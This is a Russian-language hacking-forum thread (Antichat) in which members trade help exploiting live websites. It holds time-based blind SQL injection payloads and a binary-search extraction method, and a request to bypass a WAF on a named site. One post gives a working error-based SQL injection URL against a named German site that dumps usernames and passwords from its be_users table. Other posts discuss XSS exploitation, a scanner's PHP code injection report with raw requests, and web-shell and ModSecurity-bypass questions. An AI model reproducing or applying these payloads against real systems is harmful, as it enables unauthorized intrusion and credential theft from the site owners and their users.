Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by +, 27 Apr 2015.

  1. fandor9

    fandor9 Reservists Of Antichat

    Joined:
    16 Nov 2018
    Messages:
    630
    Likes Received:
    1,050
    Reputations:
    47
    Что-бы узнать имеет-ли 2-ой символ значение 'A':
    Code:
    'OR(if(substring(version(),2,1)='А'),sleep(3),0))OR'*/
    ещё лучше перебирать по ASCII (53='5') т.е. является ли 2ой символ цифрой 5:
    Code:
    'OR(if(ASCII(SUBSTR(VERSION(),2,1))=53),sleep(3),0))OR'*/
     
    testvalue likes this.
  2. testvalue

    testvalue New Member

    Joined:
    30 May 2020
    Messages:
    4
    Likes Received:
    0
    Reputations:
    0
    Спасибо большое, дружище, сейчас пойду пробовать :)
     
  3. crlf

    crlf Green member

    Joined:
    18 Mar 2016
    Messages:
    683
    Likes Received:
    1,513
    Reputations:
    460
    Оказалось немного иначе, но смысл как раз в затруднении детекта.

    Подробный разбор:
    https://blog.malwarebytes.com/threa...ata-exfiltrates-credit-cards-via-image-files/

    Опус от автора техники:
    https://xss.is/threads/39071/
     
    fandor9 likes this.
  4. попугай

    попугай Elder - Старейшина

    Joined:
    15 Jan 2008
    Messages:
    1,518
    Likes Received:
    401
    Reputations:
    196
    Какие шеллы сейчас актуальны?
     
  5. testvalue

    testvalue New Member

    Joined:
    30 May 2020
    Messages:
    4
    Likes Received:
    0
    Reputations:
    0
    Привет.

    Помогите докрутить скулю и обойти WAF.

    https://www.hbo.ro/TitleDetail.aspx?ScheduleId='OR(if(now()=sysdate(),sleep(5),0))OR'xxx -> True, задержка 5 секунд

    На sleep() реагирует, и видно, что там есть скуля, но при попытке извлечь например, version() или user() cудя по всему срабатывает WAF.

    Пытался через вектор 'OR(if(ASCII(SUBSTR(VERSION(),1,1))=53),sleep(3),0))OR', но облом.

    Спасибо.
     
  6. DezMond™

    DezMond™ Elder - Старейшина

    Joined:
    10 Jan 2008
    Messages:
    3,619
    Likes Received:
    432
    Reputations:
    234
    Помогите раскрутить, все идёт с запроса в LIKE
    Code:
    https://www.wbt.de/no_cache/english/contact/europe/austria.html?rmhaendlerinfo[show]=search&no_cache=1&rmhaendlerinfo[word]=sa%22
     
  7. neur0funk

    neur0funk Member

    Joined:
    9 May 2018
    Messages:
    22
    Likes Received:
    18
    Reputations:
    12
    Code:
    https://www.wbt.de/no_cache/english/contact/europe/austria.html?rmhaendlerinfo[show]=search&no_cache=1&rmhaendlerinfo[word]=sa%22/**/or/**/(extractvalue(0x0a,concat(0x0a,(select(group_concat(concat_ws(0x3a,username,password)))from(be_users)))))=%22
     
    DezMond™ likes this.
  8. FireRidlle

    FireRidlle Member

    Joined:
    7 Jul 2009
    Messages:
    37
    Likes Received:
    5
    Reputations:
    3
    здравствуйте. вопрос по валидации числовых параметров. есть параметр page. если передать 1' то возвращает первую страницу, 1" так же, 2-1 то вторую страницу. -1 ошибка. можно что что сделать?
     
  9. FireRidlle

    FireRidlle Member

    Joined:
    7 Jul 2009
    Messages:
    37
    Likes Received:
    5
    Reputations:
    3
    еще можно не сравнением а бинарным поиском через >= к примеру если хочешь знаешь что только цифры
    Code:
    'OR(if(ASCII(SUBSTR(VERSION(),2,1))>=53),sleep(3),0))OR'*
    сработало, то берем среднее число из диапазона между 53 и 57, к примеру >=55. не сработало значит чекаешь 53,54. если сработало то 55,56,57. очень ускоряет когда нужно искать цифры и буквы в разном регистре
     
    fandor9 likes this.
  10. crlf

    crlf Green member

    Joined:
    18 Mar 2016
    Messages:
    683
    Likes Received:
    1,513
    Reputations:
    460
    99.9% - ничего. В случае PHP, может выглядеть так:
    Code:
    var_dump(intval("1'"));
    var_dump(intval("2-1")); 
    var_dump(intval(-1));
    
    int(1) //есть в бд
    int(2) //есть в бд
    int(-1) //нет такого, ошибка
    
     
    FireRidlle likes this.
  11. neur0funk

    neur0funk Member

    Joined:
    9 May 2018
    Messages:
    22
    Likes Received:
    18
    Reputations:
    12
    если intval вожно большое число 92233720368547758079 +1 , в запрос попадёт 2e+, но это при условии старого пыха
     
    FireRidlle likes this.
  12. DezMond™

    DezMond™ Elder - Старейшина

    Joined:
    10 Jan 2008
    Messages:
    3,619
    Likes Received:
    432
    Reputations:
    234
    Хелп помогите раскрутить
    Code:
    https://www.egtexpress.com/cs/zeme/slovinsko"/?no_cache=1
     
  13. Octavian

    Octavian Elder - Старейшина

    Joined:
    8 Jul 2015
    Messages:
    506
    Likes Received:
    101
    Reputations:
    25
    Привет Burp/Acunetix показывает XSS
    site.com/ru/?'><script>alert(1)</script>
    Code:
      <meta property="og:url" content='https://site.com/ru/?'><script>alert(1)</script>' />
    Но в браузере происходит URL Encode
    Code:
    <meta property="og:url" content='https://site.com/ru/?%27%3E%3Cscript%3Ealert(1)%3C/script%3' />
    Вопрос есть тут или нет XSS? ведь и за URL Encode ничего не срабатывает.
    Как эксплуатировать?
     
  14. BigBear

    BigBear Escrow Service
    Staff Member Гарант - Escrow Service

    Joined:
    4 Dec 2008
    Messages:
    1,801
    Likes Received:
    919
    Reputations:
    862
    Юзать разные Tricks

    Например для IE работает связка через 'location=URL' в чистом виде
    Можно почитать подробнее у BlackFan - https://blog.blackfan.ru/2016/09/ie-location-bug.html
     
    _________________________
    Octavian likes this.
  15. Gutman999

    Gutman999 New Member

    Joined:
    22 Sep 2020
    Messages:
    12
    Likes Received:
    2
    Reputations:
    0
    Нашел php code injection на сайте, не ложную. Нашел гайд. Но там на странице авторизации проходит выполнения кода. У меня нет. Кто подскажет как выполнить уязвимость. Могу скинуть со сканера уязвимость
     
  16. neur0funk

    neur0funk Member

    Joined:
    9 May 2018
    Messages:
    22
    Likes Received:
    18
    Reputations:
    12
    кидай
     
  17. Gutman999

    Gutman999 New Member

    Joined:
    22 Sep 2020
    Messages:
    12
    Likes Received:
    2
    Reputations:
    0
    Прошу прощения. PHP Code Injection
    Code:
    
    PHP code injection
    
    Vulnerability description
    
    This script is vulnerable to PHP code injection.
    
    
    The vulnerability affects https://www.site.de/widget.php , 7521
    
    Discovered by /Scripts/PerScheme/PHP_Code_Injection.script
    
    Attack details
    
    JSON input 7521 was set to ${@print(md5(acunetix_wvs_security_test))}
    
    Possible execution result:
    
    63c19a6da79816b21429e5bb262daed8
    
    HTTP request
    
    POST /widget.php HTTP/1.1
    Content-Type: application/x-www-form-urlencoded
    Connection: keep-alive
    Cookie: language=0;sid=v8o8b0le02vr097h6vbfes1cd0;sid_key=oxid;cookieConsent=functional,marketing;bie_sCookieListId=dbb53ee616bcb82137ffd68e1d0e2f38;ga-disable-UA-27119953-1=true;tc_cj_v2=_rn_lh%5BfyfcheZZZ222H%7B%7D0%29%20/%243G-%20%21%20--%20-H%7D*%28ZZZKPJKNQLLLJOMKZZZ%5D;tCdebugLib=1;tc_custom_campaign=EXTERNAL_LINK@@@www.acunetix-referrer.com@@@1601474230887;tc_custom_cj=;tc_BasketFreeseSession=1;emos_jcvid=AXTfJhMocd6e1u6fAeE6klz_afKVWU7V:1:0:0:0:true:1
    Authorization: Basic YW5vbnltb3VzOmFub255bW91cw==
    Accept: */*
    Accept-Encoding: gzip,deflate
    Content-Length: 309
    Host: www.site.de
    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
    
    actcontrol=celebros&&cl=marm_klfilter_widget&filterForm[size][]=%24{%40print(md5(acunetix_wvs_security_test))}&fnc=submitFilterForm&listtype=qwiser&parentView=celebros&searchHandle=UVQxMGFHVl9RajEwYUdWX1J6MDNOVEl4WGpGX1NUMXdjbWxqWlg1TFBUUl9URDB4ZmswOU1YNU9QVE5f&searchparam=the&sortAscending=1&sortFieldName=1
    
    Также есть GET запрос
    URL encoded GET input searchparam was set to ${@print(md5(acunetix_wvs_security_test))}
    
    Possible execution result:
    
    63c19a6da79816b21429e5bb262daed8
    HTTP request
    
    GET /index.php?search=&cl=celebros&searchparam=%24{%40print(md5(acunetix_wvs_security_test))} HTTP/1.1
    Connection: keep-alive
    Cookie: language=0;sid=inoaht3jja8trerg9gr98il824;sid_key=oxid;cookieConsent=functional,marketing;bie_sCookieListId=dbb53ee616bcb82137ffd68e1d0e2f38
    Authorization: Basic YW5vbnltb3VzOmFub255bW91cw==
    Accept: */*
    Accept-Encoding: gzip,deflate
    Host: www.site.de
    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
    
    
     
  18. neur0funk

    neur0funk Member

    Joined:
    9 May 2018
    Messages:
    22
    Likes Received:
    18
    Reputations:
    12
    а хост какой?
     
  19. DezMond™

    DezMond™ Elder - Старейшина

    Joined:
    10 Jan 2008
    Messages:
    3,619
    Likes Received:
    432
    Reputations:
    234
  20. karkajoi

    karkajoi Well-Known Member

    Joined:
    26 Oct 2016
    Messages:
    487
    Likes Received:
    459
    Reputations:
    8
    Not Acceptable!
    An appropriate representation of the requested resource could not be found on this server. This error was generated by Mod_Security.
    Mod_Security bypass
    https://forum.antichat.ru/threads/425295/